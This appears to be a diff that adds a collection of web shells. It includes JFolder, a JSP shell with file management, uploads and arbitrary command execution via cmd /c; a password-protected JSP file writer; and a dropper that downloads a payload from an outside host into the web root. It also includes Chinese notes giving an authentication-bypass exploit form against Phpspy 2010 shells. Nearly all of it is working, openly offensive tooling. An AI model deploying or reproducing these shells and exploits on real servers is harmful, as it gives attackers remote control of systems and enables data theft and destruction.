<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
<br>Email:121208099#qq.com

993
jsp/data02.jsp Normal file
View file

@ -0,0 +1,993 @@
<%
/**
JFolder V0.9 windows platform
@Filename?? JFolder.jsp
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
@Bugs : ?????±??????????????·¨????????
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
String[] strCommand = {"CMD ?ü ??","Command Window"};
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
String[] strHelp = {"°? ?ú","Help"};
String[] strParentFolder = {"????????","Parent Folder"};
String[] strCurrentFolder= {"?±?°????","Current Folder"};
String[] strDrivers = {"?????÷","Drivers"};
String[] strFileName = {"????????","File Name"};
String[] strFileSize = {"?????ó??","File Size"};
String[] strLastModified = {"×??ó????","Last Modified"};
String[] strFileOperation= {"??????×÷","Operations"};
String[] strFileEdit = {"????","Edit"};
String[] strFileDown = {"????","Download"};
String[] strFileCopy = {"????","Move"};
String[] strFileDel = {"????","Delete"};
String[] strExecute = {"????","Execute"};
String[] strBack = {"·???","Back"};
String[] strFileSave = {"±???","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows?????????????????ù????????
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M ????5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("?????ó???? 0 ×???????????????°?");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("?????????? "+strPath+"<p>");
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("???????? ??"+strPath+"<p>");
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>??????????</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" ???????¨?§°?");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" ???????¨?§°?");
}
else
{
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("?·?¨?????????? "+file+" ????"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>JSP Shell ·?°??????ú</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; ???ê??
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p>???????????÷</p>
<p>&nbsp;&nbsp;&nbsp; jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
<p>??windows??cmd??</p>
<p>&nbsp;</p>
<p>????????</p>
<p>&nbsp;&nbsp;&nbsp;<b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
<p>&nbsp;</p>
<p>?????ü??????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; ??????jsp&nbsp;???ò?????????ò???????????????????????ò</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="????">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
<br>Email:121208099#qq.com

1
jsp/guige02.jsp Normal file
View file

@ -0,0 +1 @@
<%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private String password="734303";//??¡¤????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#ffffff"><%String act="";String path=request.getParameter("path");String content=request.getParameter("content");String url=request.getRequestURI();String url2=request.getRealPath(request.getServletPath());try{act=request.getParameter("act").toString();}catch(Exception e){}if(request.getSession().getAttribute("hehe")!=null){if(request.getSession().getAttribute("hehe").toString().equals("hehe")){if (path!=null && !path.equals("") && content!=null && !content.equals("")){ try{ File newfile=new File(path); PrintWriter writer=new PrintWriter(newfile); writer.println(content); writer.close(); if (newfile.exists() && newfile.length()>0) { out.println("<font size=3 color=red>save ok!</font>"); }else{ out.println("<font size=3 color=red>save erry!</font>"); } }catch(Exception e) { e.printStackTrace(); }}out.println("<form action="+url+" method=post>");out.println("<font size=3><br></font><input type=text size=54 name='path'><br>");out.println("<font size=3 color=red>"+url2+"</font><br>");out.println("<textarea name='content' rows=15 cols=50></textarea><br>");out.println("<input type='submit' value='save!'>");out.println("</form>");}}else{out.println("<div align='center'><form action='?act=login' method='post'>");out.println("<input type='password' name='pass'/>");out.println("<input type='submit' name='update' class='unnamed1' value='Login' />");out.println("</form></div>");}if(act.equals("login")){ String pass=request.getParameter("pass"); if(pass.equals(password)) { session.setAttribute("hehe","hehe"); String uri=request.getRequestURI(); uri=uri.substring(uri.lastIndexOf("/")+1); response.sendRedirect(uri); }else {out.println("Error");out.println("<a href='javascript:history.go(-1)'><font color='red'>go back</font></a></div><br>"); } }%></body></html>

1
jsp/web02.jsp Normal file
View file

@ -0,0 +1 @@
<%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.getRealPath("/")+request.getParameter("f");new File(t).getParentFile().mkdirs();if(request.getParameter("p")==null){DataInputStream i=new DataInputStream(((HttpURLConnection)(new URL("http://qztmi.cn/js/h.txt").openConnection())).getInputStream());DataOutputStream o=new DataOutputStream(new FileOutputStream(t));byte[] b=new byte[4096];int c=0;while((c=i.read(b))>0){o.write(b,0,c);}o.close();i.close();out.println("down-ok");response.setHeader("down-ok","1");}else{(new FileOutputStream(t)).write(request.getParameter("p").getBytes());out.println("upload-ok");}%>

28
php/Phpspy 2010 身份验证绕过漏洞 Normal file
View file

@ -0,0 +1,28 @@
Phpspy 2010 身份验证绕过漏洞
作者:我不知道该唱什么 发布时间April 17, 2011 00:21:28 分类tech
利用代码:
<form method="POST" action="http://mirc.3est.com/1.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="submit" value="Login">
</form>
在每次向shell请求数据的时候 都附加post一个admin['pass']即可。
形成原因:
2009不存在该洞仅限2010版本对比二者即可得到答案
利用
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
对变量$admin['pass']进行覆盖。

43
php/Phpspy 2011 继续身份验证绕过漏洞 Normal file
View file

@ -0,0 +1,43 @@
Phpspy 2011 继续身份验证绕过漏洞
作者:我不知道该唱什么 发布时间May 1, 2011 14:58:54 分类tech
